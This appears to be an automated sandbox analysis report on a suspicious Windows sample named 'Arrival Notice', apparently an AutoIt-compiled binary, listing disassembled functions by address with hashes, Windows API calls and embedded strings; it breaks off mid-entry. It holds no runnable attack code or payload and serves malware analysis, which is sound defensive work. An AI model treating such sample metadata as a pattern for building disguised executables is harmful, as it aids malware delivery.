Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5

Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619

Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

Strings

N@, xrefs: 0042201C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88

Function 0040FA10 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0

Function 004129D0 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4

Function 004125E8 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4

Function 00412216 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4

Function 03C63648 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: b777ae546a3600baf0c84225214fb19750936b2ba7197b327db63ab0b3e21264
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: BD41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90

Function 03C634D8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 0580682911fc127a3825c69a2e67fd5a76c0860371a41de0342a59dd6cfda700
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: F7019278A00249EFCB44DF98C5909AEF7B5FB88310F248599D809EB711D730AE41DB80

Function 03C63538 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: c66b6f622360ac214110e98dd11b01ca201499b6b72bd2caf3effdfc6865061c
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 51019278A00249EFCB44DF98C5909AEF7F5FB88310F248599D809EB351D730AE41DB80

Function 03C61EB8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0045953B
DeleteObject.GDI32(?), ref: 00459551
DestroyWindow.USER32(?), ref: 00459563
GetDesktopWindow.USER32 ref: 00459581
GetWindowRect.USER32(00000000), ref: 00459588
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
GetClientRect.USER32(00000000,?), ref: 004596F8
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
GlobalLock.KERNEL32(00000000), ref: 0045978F
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
GlobalUnlock.KERNEL32(00000000), ref: 004597A5
CloseHandle.KERNEL32(00000000), ref: 004597AC
CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
GlobalFree.KERNEL32(00000000), ref: 004597E2
CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
ShowWindow.USER32(?,00000004), ref: 00459865
CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
GetStockObject.GDI32(00000011), ref: 004598CD
SelectObject.GDI32(00000000,00000000), ref: 004598D5
GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
DeleteDC.GDI32(00000000), ref: 004598F8
_wcslen.LIBCMT ref: 00459916
_wcscpy.LIBCMT ref: 0045993A
CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
GetDC.USER32(00000000), ref: 004599FC
SelectObject.GDI32(00000000,?), ref: 00459A0C
SelectObject.GDI32(00000000,00000007), ref: 00459A37
ReleaseDC.USER32(00000000,00000000), ref: 00459A42
MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D

Strings

AutoIt v3, xrefs: 004596E2
static, xrefs: 0045972D, 004598A8
DISPLAY, xrefs: 004598BB
, xrefs: 004599F5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
String ID: $AutoIt v3$DISPLAY$static
API String ID: 4040870279-2373415609
Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68

Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0044181E
SetTextColor.GDI32(?,?), ref: 00441826
GetSysColorBrush.USER32(0000000F), ref: 0044183D
GetSysColor.USER32(0000000F), ref: 00441849
SetBkColor.GDI32(?,?), ref: 00441864
SelectObject.GDI32(?,?), ref: 00441874
InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
GetSysColor.USER32(00000010), ref: 004418B2
CreateSolidBrush.GDI32(00000000), ref: 004418B9
FrameRect.USER32(?,?,00000000), ref: 004418CA
DeleteObject.GDI32(?), ref: 004418D5
InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
FillRect.USER32(?,?,?), ref: 00441970

Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
String ID:
API String ID: 69173610-0
Opcode ID: 48fd73e387246f87b58864884df5ee337fd89055d1a359018ab7483993a2f074
Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
Opcode Fuzzy Hash: 48fd73e387246f87b58864884df5ee337fd89055d1a359018ab7483993a2f074
Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66

Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004590F2
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
GetClientRect.USER32(00000000,?), ref: 0045924E
CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
GetStockObject.GDI32(00000011), ref: 004592AC
SelectObject.GDI32(00000000,00000000), ref: 004592B4
GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
DeleteDC.GDI32(00000000), ref: 004592D6
CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
GetStockObject.GDI32(00000011), ref: 004593D3
SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE

Strings

AutoIt v3, xrefs: 0045923C
static, xrefs: 00459289, 004593C1
msctls_progress32, xrefs: 00459364
DISPLAY, xrefs: 00459298

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68

Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00428414

Strings

Unterminated group of comments, xrefs: 00428684
#ce, xrefs: 00428645
#NoAutoIt3Execute, xrefs: 00428451
#include-once, xrefs: 004284E7
Cannot parse #include, xrefs: 004285A1
#comments-end, xrefs: 00428631
#notrayicon, xrefs: 0042840C
#requireadmin, xrefs: 0042842F
#OnAutoItStartRegister, xrefs: 00428473
#include, xrefs: 00428547
#comments-start, xrefs: 004285B7, 00428609
#cs, xrefs: 004285CB, 0042861D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsnicmp
String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-3360698832
Opcode ID: 7c4153de5aac5a6f6683c87829e90f4d03aa6f603926696f14061938e7bc4c0c
Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
Opcode Fuzzy Hash: 7c4153de5aac5a6f6683c87829e90f4d03aa6f603926696f14061938e7bc4c0c
Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE

Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00430754
SetCursor.USER32(00000000), ref: 0043075B
LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
SetCursor.USER32(00000000), ref: 00430773
LoadCursorW.USER32(00000000,00007F03), ref: 00430784
SetCursor.USER32(00000000), ref: 0043078B
LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
SetCursor.USER32(00000000), ref: 004307A3
LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
SetCursor.USER32(00000000), ref: 004307BB
LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
SetCursor.USER32(00000000), ref: 004307D3
LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
SetCursor.USER32(00000000), ref: 004307EB
LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
SetCursor.USER32(00000000), ref: 00430803
LoadCursorW.USER32(00000000,00007F85), ref: 00430814
SetCursor.USER32(00000000), ref: 0043081B
LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
SetCursor.USER32(00000000), ref: 00430833
LoadCursorW.USER32(00000000,00007F84), ref: 00430844
SetCursor.USER32(00000000), ref: 0043084B
LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
SetCursor.USER32(00000000), ref: 00430863
LoadCursorW.USER32(00000000,00007F02), ref: 00430874
SetCursor.USER32(00000000), ref: 0043087B
SetCursor.USER32(00000000), ref: 00430887
LoadCursorW.USER32(00000000,00007F00), ref: 00430898
SetCursor.USER32(00000000), ref: 0043089F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
